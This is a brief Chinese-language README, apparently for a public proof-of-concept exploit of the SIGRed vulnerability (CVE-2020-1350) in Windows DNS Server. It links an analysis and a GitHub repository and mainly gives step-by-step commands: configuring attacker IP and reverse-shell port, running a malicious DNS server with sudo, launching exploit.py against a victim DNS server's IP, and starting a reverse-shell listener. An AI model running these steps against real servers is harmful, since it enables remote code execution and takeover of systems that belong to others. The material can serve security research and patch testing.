关于此漏洞的详细信息:https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with-cve-2020-1350-sigred
漏洞利用:
sudo python3 configure.py -ip IP_ATTACKER -p PORT_REVERSE_SHELL -hp PORT_APACHE_SERVER (default 80)
sudo python3 evildns.py
需要sudo监听UDP和TCP端口53
然后运行:
python3 exploit.py -ip WINDNS_VICTIM_IP -d EVIL_DOMAIN
设置反弹shell的监听:
python3 reverse_shell/server.py -p PORT_REVERSE_SHELL
poc:https://github.com/chompie1337/SIGRed_RCE_PoC
ref: